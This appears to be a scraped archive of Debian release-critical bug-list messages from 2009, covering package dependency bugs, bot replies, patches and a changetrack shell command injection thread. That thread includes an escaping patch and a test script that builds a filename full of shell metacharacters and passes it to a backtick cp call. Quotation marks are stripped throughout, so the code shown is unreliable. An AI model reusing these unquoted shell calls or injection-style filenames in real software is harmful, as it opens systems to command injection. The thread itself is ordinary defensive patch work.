/usr/bin/Xorg /var/lib/x11/xorg.conf.roster does not exist. VGA-compatible devices on PCI bus: 01:00.0 VGA compatible controller: ATI Technologies Inc RV280 [Radeon 9200 SE] (rev 01) /var/lib/x11/xorg.conf.md5sum does not exist. Xorg X server configuration file status: lrwxrwxrwx 1 root root 16 2008-09-26 23:10 /etc/X11/xorg.conf - xorg.conf.compiz Contents of /etc/X11/xorg.conf: # xorg.conf (X.Org X Window System server configuration file) # # This file was generated by dexconf, the Debian X Configuration tool, using # values from the debconf database. # # Edit this file with caution, and see the xorg.conf manual page. # (Type man xorg.conf at the shell prompt.) # # This file is automatically updated on xserver-xorg package upgrades *only* # if it has not been modified since the last upgrade of the xserver-xorg # package. # # If you have edited this file but would like it to be automatically updated # again, run the following command: # sudo dpkg-reconfigure -phigh xserver-xorg Section InputDevice Identifier Generic Keyboard Driver kbd Option XkbRulesxorg Option XkbModelpc105 Option XkbLayout fi Option XkbVariant nodeadkeys EndSection Section InputDevice Identifier Configured Mouse Driver mouse EndSection # See http://wiki.debian.org/Compiz # Dedicated Extensions section (may not be present already) Section Extensions Option Composite enable EndSection Section Device Identifier Configured Video Device Option UseFBDevtrue Option XAANoOffscreenPixmaps true EndSection Section Monitor Identifier Configured Monitor EndSection Section Screen Identifier Default Screen Monitor Configured Monitor EndSection Xorg X server log files on system: -rw-r--r-- 1 root root 47608 2007-04-08 15:29 /var/log/Xorg.20.log -rw-r--r-- 1 root root 5033 2009-09-17 19:09 /var/log/Xorg.0.log Contents of most recent Xorg X server log file /var/log/Xorg.0.log: X.Org X Server 1.6.3 Release Date: 2009-7-31 X Protocol Version 11, Revision 0 Build Operating System: Linux 2.6.30.4-dsa-ia32 i686 Debian Current Operating System: Linux ressu 2.6.30-1-686 #1 SMP Sat Aug 15 19:11:58 UTC 2009 i686 Build Date: 06 August 2009 04:49:57PM xorg-server 2:1.6.3-1+b1 (bui...@murphy.debian.org) Before reporting problems, check http://wiki.x.org to make sure that you have the latest version. Markers: (--) probed, (**) from config file, (==) default setting, (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (NI) not implemented, (??) unknown. (==) Log file: /var/log/Xorg.0.log, Time: Thu Sep 17 19:09:49 2009 (==) Using config file: /etc/X11/xorg.conf (==) No Layout section. Using the first Screen section. (**) |--Screen Default Screen (0) (**) | |--Monitor Configured Monitor (==) No device specified for screen Default Screen. Using the first device section listed. (**) | |--Device Configured Video
Processed: affects 541342
Processing commands for cont...@bugs.debian.org: affects 541342 + libclass-mop-perl Bug #541342 [buildd.debian.org] please upgrade sbuild on peri, caballero, ball, mayer, lxdebian and schroeder (at least) Added indication that 541342 affects libclass-mop-perl End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: affects 541342
Processing commands for cont...@bugs.debian.org: affects 541342 + libdevel-declare-perl Bug #541342 [buildd.debian.org] please upgrade sbuild on peri, caballero, ball, mayer, lxdebian and schroeder (at least) Added indication that 541342 affects libdevel-declare-perl End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547211: iceweasel-l10n-de: wrong versioned dependency on iceweasel
Package: iceweasel-l10n-de Version: 1:3.0.14+debian-1 Severity: grave Your package depends on iceweasel (= 3.5.3) which is not available in unstable. It would not work with that version anyway, given that install.rdf states 3.0.99 as maxVersion. -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (x86_64) Kernel: Linux 2.6.30.7-amd64 (SMP w/2 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages iceweasel-l10n-de depends on: ii iceweasel 3.0.14-1 lightweight web browser based on M Versions of packages iceweasel-l10n-de recommends: ii myspell-de-de 20071211-1 German dictionary for myspell iceweasel-l10n-de suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546665: l7-protocols: overwrites user configuration files
2009/9/17 Piotr Lewandowski piotr.lewandow...@gmail.com: Hi Alan, I need your advice what to do with my first RC-bug. :) I would normally recommend CC'ing discussions relating to how to fix the bug to the bug report itself - someone else might read the bug and have something relevant to offer to the discussion, or alternatively if the bug takes a while to fix it shows someone contemplating an NMU why the solution is non-trivial and how you've considered fixing it (which as the maintainer you're likely to know the repercussions of the 'obvious' fix better than someone who first saw the package 5 minutes ago). * Jakub Wilk uba...@users.sf.net, 2009-09-14 23:58: Package: l7-protocols Version: 20090528-1 Severity: serious Justification: Policy 10.8.3 l7-protocols would happily overwrite user configuration files: # ls -l /etc/l7-protocols/extra/http-itunes.pat -rw--- 1 root root 30 Sep 14 22:57 /etc/l7-protocols/extra/http-itunes.pat # dpkg -i /path/to/l7-protocols_20090528-1_all.deb [...] Unpacking l7-protocols (from .../l7-protocols_20090528-1_all.deb) ... Setting up l7-protocols (20090528-1) ... # ls -l /etc/l7-protocols/extra/http-itunes.pat* lrwxrwxrwx 1 root root 45 Sep 14 22:57 /etc/l7-protocols/extra/http-itunes.pat - /usr/share/l7-protocols/extra/http-itunes.pat I've talked to Jakub about this issue and we've came up with some possible solutions (none of which are ideal): 1) /etc/l7-protocols would be a symlink to /usr/share/l7-protocols managed by maintainer scripts of l7-protocols. It is not clear what to do during removal (and before purge) - we shouldn't leave a dangling symlink in /etc. I would avoid this one: mkdir /etc/l7-protocols/local-custom # really makes it in /usr/share/l7-protocols is a bad idea 2) Patch l7-filter-userspace to look into /usr/share/l7-protocols for protocol definitions rather than /etc/l7-protocols. Then l7-protocols could provide no /etc/l7-protocols at all. This might be a sensible option, although it's a significant deviation from what upstream do. There are definitely other packages that take this approach. Would it be possible to make it look in both /etc/l7-protocols (which gets installed/created empty by default) *and* /usr/share/l7-protocols? That might make sense from a behaviour point of view. 3) l7-protocols maintainer would maintain symlink farm, just like ca-certificates does. (This would be a significant maintenance burden, though.) I don't much like this one, it seems like over-engineering the problem with all that it would entail. 4) Just put all the protocol definitions into /etc/l7-protocols and make them conffiles. That's an interesting one. They fall nicely into a grey area with regards to what is/isn't really a conf file. 5) Mark symlinks in /etc/l7-protocols as conffiles. I don't know if it really would help, though. To be honest I'm not actually sure what the behaviour would be in that case either! Would be interesting to try it and see, if it works this would be quite a good solution. What do you think? I think I'd rank the solutions in order of preference 5 (if it works!), 2 (adding both locations), 4, 2 (changing the location), 3, 1 How trivial would a patch for 2 be? Alan -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#535305: 535305 Re: common-lisp-controller: update fails rebuilding sb-grovel,, asdf broken as a result
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 Hello David, Fredrik, Indeed the clc version 6.18 does not work with older versions of sbcl. I've had to change the native-file-kind package. However I've also added a Conflict against sbcl ( 1:1.0.29.0). So why did it want to install with an older version of sbcl? Groetjes, Peter - -- signature -at- pvaneynd.mailworks.org http://www.livejournal.com/users/pvaneynd/ God, root, what is difference? Pitr | God is more forgiving. Dave Aronson| -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBCAAGBQJKsoYEAAoJEB4VNT76eIlaA/4P/2sA4AzWq69Gm+pxyd7lW91N TvCYCcH6Hry19gjK4fih9ZQyL92SKHHhnSC8wEGDLH1N1spTQkll9kB75pg1ljsx 5gTs6t8HNLzsNaQMZhP7KYeEf16WrDL8V8eNri1ivFRCH697664KMqmxC2cVsMCj EKgICWThlrwe7hYXry+NgVsS7juvJW0rblYxJLEUu1HXKkQWPbLFFy2+bJ4iZu8u rHYJongZ5GzdgDpJLFejUmzb/gJcjnQPNQw99E1MtfDgRyj2zz0cN4dDOo5YuMU9 wy0rxqgs/sRPwbFjT7o8hyfTXcRPiHc0m6Wfqn6oqEd0uus0RnkWMTqe2efl8W3i Odms7zrblV/GfAmTXVQUol6FxkMaxGapo8gYS2GLUln8hVDHxRznv7kPAOBVEU/S Pz+AmB20YIjQFHg4QTxrX2mX6JUkB92PBbJCotK4bH4JesxvtD0/3OmNnfr7O8T+ pPkzGPPHLhOfYR8PiVizkGK3IBcV9L2X+bNyY5WEU25WcHCwyrGwBnskp7eRawcj e7A6IMF0SW3sUluuV4VIIZECcjo27QBJYrqX41cQIQYgVm5uXpwCd097Q2Zuo5Tx lVOj5lVcrxs08uepIDwgt0qJmNjo5P6RhUhZwdE1hJ9/GhqqGbKH6ju1JUSGrClW FndR7Cev1BP1hM/MgNDG =ZVQb -END PGP SIGNATURE- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547038: Acknowledgement (Still dash vs bash problems)
Well, installing dash=0.5.5.1-3 instead of the previous NMU before trying bash install solved the problem. I would add a = 0.5.5.1-3 on the bash dep on dash. -- Francesco P. Lovergine -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#537194: marked as done (Exports wsdl-soal-call rather than wsdl-soap-call)
Your message dated Thu, 17 Sep 2009 21:15:05 +0200 with message-id 4ab28ab9.3090...@debian.org and subject line package removed from debian [eom] has caused the Debian Bug report #537194, regarding Exports wsdl-soal-call rather than wsdl-soap-call to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 537194: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=537194 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: cl-soap Version: 20060105-2 Severity: serious The defpackage for :cl-soap, which is installed into /usr/share/common-lisp/source/cl-soap/src/package.lisp exports the symbol :wsdl-soal-call rather than :wsdl-soap-call, the correct name. (The function #'wsdl-soap-call is the final function defined in wsdl.lisp) ---End Message--- ---BeginMessage--- ---End Message---
Bug#535305: 535305 Re: common-lisp-controller: update fails rebuilding sb-grovel,, asdf broken as a result
Peter Van Eynde wrote: Indeed the clc version 6.18 does not work with older versions of sbcl. I've had to change the native-file-kind package. However I've also added a Conflict against sbcl ( 1:1.0.29.0). So why did it want to install with an older version of sbcl? If for some reason you need to CLC to be compatible with older versions of SBCL, I use code like below: (let ((file-kind-fun (or (find-symbol NATIVE-FILE-KIND :sb-impl) (find-symbol UNIX-FILE-KIND :sb-unix (when file-kind-fun (funcall file-kind-fun path-string))) -- Kevin Rosenberg ke...@rosenberg.net signature.asc Description: Digital signature
Bug#535305: marked as done (common-lisp-controller: update fails rebuilding sb-grovel, asdf broken as a result)
Your message dated Thu, 17 Sep 2009 19:17:23 +
with message-id e1momtr-0001ok...@ries.debian.org
and subject line Bug#535305: fixed in common-lisp-controller 6.20
has caused the Debian Bug report #535305,
regarding common-lisp-controller: update fails rebuilding sb-grovel, asdf
broken as a result
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)
--
535305: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=535305
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
---BeginMessage---
Package: common-lisp-controller
Version: 6.18
Severity: grave
Justification: renders package unusable
The results of an upgrade on this machine is as below.
I now can't use sbcl if I want to use asdf, which makes sbcl pretty much broken
for me.
sudo apt-get install common-lisp-controller --reinstall
Reading package lists... Done
Building dependency tree
Reading state information... Done
0 upgraded, 0 newly installed, 1 reinstalled, 0 to remove and 1 not upgraded.
Need to get 0B/33.3kB of archives.
After this operation, 0B of additional disk space will be used.
Do you want to continue [Y/n]?
Preconfiguring packages ...
(Reading database ... 193933 files and directories currently installed.)
Preparing to replace common-lisp-controller 6.18 (using
.../common-lisp-controller_6.18_all.deb) ...
Unpacking replacement common-lisp-controller ...
Processing triggers for man-db ...
Setting up common-lisp-controller (6.18) ...
Reinstalling for sbcl
Recompiling Common Lisp Controller for sbcl
/usr/lib/common-lisp/bin/sbcl.sh loading and dumping clc.
; loading system definition from /usr/lib/sbcl/sb-grovel/sb-grovel.asd into
; #PACKAGE ASDF1
; registering #SYSTEM SB-GROVEL {B4DFBF9} as SB-GROVEL
;
; compilation unit aborted
; caught 1 fatal ERROR condition
Error running init-common-lisp-controller-v4: Lock on package SB-IMPL violated
when interning NATIVE-FILE-KIND.
See also:
The SBCL Manual, Node Package Locks
mv: cannot stat `sbcl-new.core': No such file or directory
FAILED
Done rebuilding
When I try to load an asdf module with requires in the REPL, I get the
following :-
sbcl
This is SBCL 1.0.25.debian, an implementation of ANSI Common Lisp.
More information about SBCL is available at http://www.sbcl.org/.
SBCL is free software, provided as is, with absolutely no warranty.
It is mostly in the public domain; some portions are provided under
BSD-style licenses. See the CREDITS and COPYING files in the
distribution for more information.
* (require 'cl-pdf)
debugger invoked on a SB-INT:EXTENSION-FAILURE in thread #THREAD initial
thread RUNNING {A8F7771}:
Don't know how to REQUIRE CL-PDF.
See also:
The SBCL Manual, Variable *MODULE-PROVIDER-FUNCTIONS*
The SBCL Manual, Function REQUIRE
Type HELP for debugger help, or (SB-EXT:QUIT) to exit from SBCL.
restarts (invokable by number or by possibly-abbreviated name):
0: [ABORT] Exit debugger, returning to top level.
(SB-IMPL::REQUIRE-ERROR Don't know how to ~S ~A.)[:EXTERNAL]
0]
-- System Information:
Debian Release: squeeze/sid
APT prefers testing
APT policy: (500, 'testing')
Architecture: i386 (i686)
Kernel: Linux 2.6.26-2-686 (SMP w/1 CPU core)
Locale: LANG=en_AU.UTF-8, LC_CTYPE=en_AU.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages common-lisp-controller depends on:
ii bash 3.2-5 The GNU Bourne Again SHell
ii cl-asdf 1.111-1Another System Definition Facility
ii debconf [debconf-2.0] 1.5.26 Debian configuration management sy
ii debianutils 3.1.3 Miscellaneous utilities specific t
ii perl 5.10.0-23 Larry Wall's Practical Extraction
ii realpath 1.15 Return the canonicalized absolute
common-lisp-controller recommends no packages.
Versions of packages common-lisp-controller suggests:
ii sbcl1:1.0.25.0-1 A Common Lisp compiler and develop
-- debconf information:
common-lisp-controller/long-site-name: Site name not initialized
common-lisp-controller/short-site-name: Unknown
---End Message---
---BeginMessage---
Source: common-lisp-controller
Source-Version: 6.20
We believe that the bug you reported is fixed in the latest version of
common-lisp-controller, which is due to be installed in the Debian FTP archive:
common-lisp-controller_6.20.dsc
to pool/main/c/common-lisp-controller/common-lisp-controller_6.20.dsc
common-lisp-controller_6.20.tar.gz
to
Bug#547211: marked as done (iceweasel-l10n-de: wrong versioned dependency on iceweasel)
Your message dated Thu, 17 Sep 2009 19:18:28 + with message-id e1momuu-0001cr...@ries.debian.org and subject line Bug#547211: fixed in iceweasel-l10n 1:3.0.14+debian-2 has caused the Debian Bug report #547211, regarding iceweasel-l10n-de: wrong versioned dependency on iceweasel to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 547211: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=547211 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: iceweasel-l10n-de Version: 1:3.0.14+debian-1 Severity: grave Your package depends on iceweasel (= 3.5.3) which is not available in unstable. It would not work with that version anyway, given that install.rdf states 3.0.99 as maxVersion. -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable') Architecture: i386 (x86_64) Kernel: Linux 2.6.30.7-amd64 (SMP w/2 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages iceweasel-l10n-de depends on: ii iceweasel 3.0.14-1 lightweight web browser based on M Versions of packages iceweasel-l10n-de recommends: ii myspell-de-de 20071211-1 German dictionary for myspell iceweasel-l10n-de suggests no packages. -- no debconf information ---End Message--- ---BeginMessage--- Source: iceweasel-l10n Source-Version: 1:3.0.14+debian-2 We believe that the bug you reported is fixed in the latest version of iceweasel-l10n, which is due to be installed in the Debian FTP archive: iceweasel-l10n-af_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-af_3.0.14+debian-2_all.deb iceweasel-l10n-all_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-all_3.0.14+debian-2_all.deb iceweasel-l10n-ar_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-ar_3.0.14+debian-2_all.deb iceweasel-l10n-as_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-as_3.0.14+debian-2_all.deb iceweasel-l10n-be_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-be_3.0.14+debian-2_all.deb iceweasel-l10n-bg_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-bg_3.0.14+debian-2_all.deb iceweasel-l10n-bn-bd_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-bn-bd_3.0.14+debian-2_all.deb iceweasel-l10n-bn-in_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-bn-in_3.0.14+debian-2_all.deb iceweasel-l10n-ca_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-ca_3.0.14+debian-2_all.deb iceweasel-l10n-cs_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-cs_3.0.14+debian-2_all.deb iceweasel-l10n-cy_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-cy_3.0.14+debian-2_all.deb iceweasel-l10n-da_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-da_3.0.14+debian-2_all.deb iceweasel-l10n-de_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-de_3.0.14+debian-2_all.deb iceweasel-l10n-dz-bt_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-dz-bt_3.0.14+debian-2_all.deb iceweasel-l10n-el_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-el_3.0.14+debian-2_all.deb iceweasel-l10n-en-gb_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-en-gb_3.0.14+debian-2_all.deb iceweasel-l10n-eo_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-eo_3.0.14+debian-2_all.deb iceweasel-l10n-es-ar_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-es-ar_3.0.14+debian-2_all.deb iceweasel-l10n-es-cl_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-es-cl_3.0.14+debian-2_all.deb iceweasel-l10n-es-es_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-es-es_3.0.14+debian-2_all.deb iceweasel-l10n-es-mx_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-es-mx_3.0.14+debian-2_all.deb iceweasel-l10n-et_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-et_3.0.14+debian-2_all.deb iceweasel-l10n-eu_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-eu_3.0.14+debian-2_all.deb iceweasel-l10n-fa-ir_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-fa-ir_3.0.14+debian-2_all.deb iceweasel-l10n-fa_3.0.14+debian-2_all.deb to pool/main/i/iceweasel-l10n/iceweasel-l10n-fa_3.0.14+debian-2_all.deb iceweasel-l10n-fi_3.0.14+debian-2_all.deb to
Processed (with 6 errors): (no subject)
Processing commands for cont...@bugs.debian.org: tag 544905 +confirmed Bug #544905 [libsigsegv] libsigsegv: FTBFS on amd64: Test failure Added tag(s) confirmed. done 402508 Unknown command or malformed arguments to command. done 546395 Unknown command or malformed arguments to command. tag 526584 +wishlist Unknown tag/s: wishlist. Recognized are: patch wontfix moreinfo unreproducible fixed potato woody sid help security upstream pending sarge sarge-ignore experimental d-i confirmed ipv6 lfs fixed-in-experimental fixed-upstream l10n etch etch-ignore lenny lenny-ignore squeeze squeeze-ignore. Bug #526584 [cmucl] CMUCL requires SSE2 CPU on i386 architecture Requested to add no tags; doing nothing. done 488040 Unknown command or malformed arguments to command. done 450204 Unknown command or malformed arguments to command. done 507302 Unknown command or malformed arguments to command. Too many unknown commands, stopping here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#547217: webkit: potential ssl certificate attack
package: webkit version: 1.1.12-1+b1 severity: serious tags: security hi, i was listening to a pauldotcom episode, and heard that webkit may be susceptible to ssl certificate attacks due to null-character stripping [0]. please check whether this is a problem, and if it is forward upstream if necessary. best wishes, mike [0] http://pauldotcom.com/2009/09/pauldotcom-security-weekly--e-25.html -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546502: cryptmount: Incorrect dependencies in init.d script
Hello Petter, Thank you for finding this bug in cryptmount's init.d scripts, and for your helpful patches. I have now merged your patches (with minor modifications to the dependency on $syslog) to create a new upstream version, 4.0.1, which should now be available at http://www.sourceforge.net/projects/cryptmount I have asked my Debian sponsor to upload this to the Debian servers on my behalf. Thanks, RW Penney -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: severity of 543742 is normal, reassign 543742 to ftp.debian.org ...
Processing commands for cont...@bugs.debian.org: severity 543742 normal Bug #543742 [tpb] tpb: should this package be removed? Severity set to 'normal' from 'serious' reassign 543742 ftp.debian.org Bug #543742 [tpb] tpb: should this package be removed? Bug reassigned from package 'tpb' to 'ftp.debian.org'. Bug No longer marked as found in versions tpb/0.6.4-2.3. retitle 543742 RM: tpb -- RoMIA/RoQA; last upload 2005, inactive maint, works only on old thinkpad Bug #543742 [ftp.debian.org] tpb: should this package be removed? Changed Bug title to 'RM: tpb -- RoMIA/RoQA; last upload 2005, inactive maint, works only on old thinkpad' from 'tpb: should this package be removed?' End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546791: changetrack: shell command injection via filename
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Jens Peter Secher pisze:
2009/9/17 Marek Grzybowski marek.grzybow...@atm.com.pl:
Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs
should be safe to:
His patch:
[...]
+my $realfile_esc = escape_shell_chars ($realfile);
[...]
- `cp $realfile $compfile`;
+ `cp $realfile_esc $compfile_esc`;
[...]
+sub escape_shell_chars
+{
+my $arg = shift;
+$arg =~ s/[;\*\|`\$!#\(\)\[\]\{\}:'\s]/\\$/g;
+return $arg;
+}
This is not going work. When $realfile_esc is different from
$realfile, then it makes no sense to copy the non-existent
$realfile_esc. I will go for the solution of rejecting weird file
names.
I'm sorry, but it works. $realfile_esc is translated back by shell to
it's original filename and target program (cp in this case) opens $realfile.
Of course, rejecting weird names is also solution, but after such modification
changetrack
still will not handle correctly files with characters mentioned above (
sometimes these filenames
are created by not malicious user e.g. filenames with spaces)
- --
Andrzej Lemieszek - Zespół Wsparcia Systemów i Aplikacji
ATM S.A., ul. Grochowska 21a, 04-186 Warszawa, Poland; http://www.atm.com.pl
tel. +48 22 5156357; PGP key ID: 0xD8A5913F
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)
iGUEARECACUFAkqyofceGGhrcDovL3Bvb2wuc2tzLWtleXNlcnZlcnMubmV0AAoJ
EFA6R1rYpZE/rS0An0HMDJS4CRgP0NCm7eIVpAwyqT9GAJ9VP7LSuKvprN9kbi10
KhbumazHbw==
=c4HU
-END PGP SIGNATURE-
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#529040: magit: Missing dependency on emacsen packages
Hi, whats the status with this bug? Since it is an dependency issue only, the bug should be fixable by correcting the dependencies and rebuilding the package, shouldn't it? This bug keeps this package from migration into testing. Adrian -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#536997: glunarclock: diff for NMU version 1:0.32.4-11.1
Dear maintainer, I've prepared an NMU for glunarclock (versioned as 1:0.32.4-11.1). From Sep, 21 I'll request sponsorhip to DELAYED/7 (i.e. you have ~10 days to cancel it with a new upload, if you wish) Regards. diff -u glunarclock-0.32.4/debian/control glunarclock-0.32.4/debian/control --- glunarclock-0.32.4/debian/control +++ glunarclock-0.32.4/debian/control @@ -10,7 +10,8 @@ libpanel-applet2-dev, libxklavier12-dev | libxklavier-dev, libxml-parser-perl, - scrollkeeper + scrollkeeper, + libglade2-dev Homepage: http://glunarclock.sourceforge.net/ Standards-Version: 3.8.0 diff -u glunarclock-0.32.4/debian/changelog glunarclock-0.32.4/debian/changelog --- glunarclock-0.32.4/debian/changelog +++ glunarclock-0.32.4/debian/changelog @@ -1,3 +1,11 @@ +glunarclock (1:0.32.4-11.1) unstable; urgency=low + + * Non-maintainer upload. + * Fix FTBFS because of missing dependency on libglade2-dev +(Closes: #536997) + + -- David Paleino d.pale...@gmail.com Thu, 17 Sep 2009 23:37:53 +0200 + glunarclock (1:0.32.4-11) unstable; urgency=low * debian/copyright: diff -u glunarclock-0.32.4/debian/rules glunarclock-0.32.4/debian/rules --- glunarclock-0.32.4/debian/rules +++ glunarclock-0.32.4/debian/rules @@ -5,7 +5,7 @@ include /usr/share/dpatch/dpatch.make -CFLAGS = -Wall -g +CFLAGS = -Wall -g -I/usr/include/libgnomeui-2.0/ ifneq (,$(findstring noopt,$(DEB_BUILD_OPTIONS))) CFLAGS += -O0 @@ -13,7 +13,7 @@ CFLAGS += -O2 endif -LDFLAGS += -Wl,-z,defs -Wl,-O1 -Wl,--as-needed +LDFLAGS += -Wl,-z,defs -Wl,-O1 -Wl,--as-needed -lgnomeui-2 configure: configure-stamp configure-stamp: patch-stamp -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546791: changetrack: shell command injection via filename
Jens Peter Secher wrote:
2009/9/17 Marek Grzybowski marek.grzybow...@atm.com.pl:
Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs
should be safe to:
His patch:
[...]
+my $realfile_esc = escape_shell_chars ($realfile);
[...]
- `cp $realfile $compfile`;
+ `cp $realfile_esc $compfile_esc`;
[...]
+sub escape_shell_chars
+{
+my $arg = shift;
+$arg =~ s/[;\*\|`\$!#\(\)\[\]\{\}:'\s]/\\$/g;
+return $arg;
+}
This is not going work. When $realfile_esc is different from
$realfile, then it makes no sense to copy the non-existent
$realfile_esc. I will go for the solution of rejecting weird file
names.
You right Jeans, it's no good enought witch enters,
I also chcked ./bashline.c in bash sources:
/* characters that need to be quoted when appearing in filenames. */
rl_filename_quote_characters = \t\n\\\'@=;|()#$`?*[!:{;/*}*/
i do some tests, and come up witch this :
$ cat test.pl
#!/usr/bin/perl
use File::NCopy qw(copy);
# test file name
my $realfile=blablabla \t\n\\\'@=;|()#\$`?*[!:{;
my $realfile_esc = escape_shell_chars ($realfile);
sub escape_shell_chars
{
my $arg = shift;
$arg =~ s/[']/\'\\$'/g;
return '.$arg.';
}
print $realfile\n;
print $realfile_esc\n;
copy( test.pl , $realfile);
print `set -x cp test.pl $realfile_esc`
--
Pozdrawiam
Marek Grzybowski
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#508292: Status of RC bug
Hello, what's the status of this bug? Can you please package the newer version, closing it? Thanks, David -- . ''`. Debian maintainer | http://wiki.debian.org/DavidPaleino : :' : Linuxer #334216 --|-- http://www.hanskalabs.net/ `. `'` GPG: 1392B174 | http://snipr.com/qa_page `- 2BAB C625 4E66 E7B8 450A C3E1 E6AA 9017 1392 B174 signature.asc Description: PGP signature
Bug#533983: hdate-applet: diff for NMU version 0.15.10-2.1
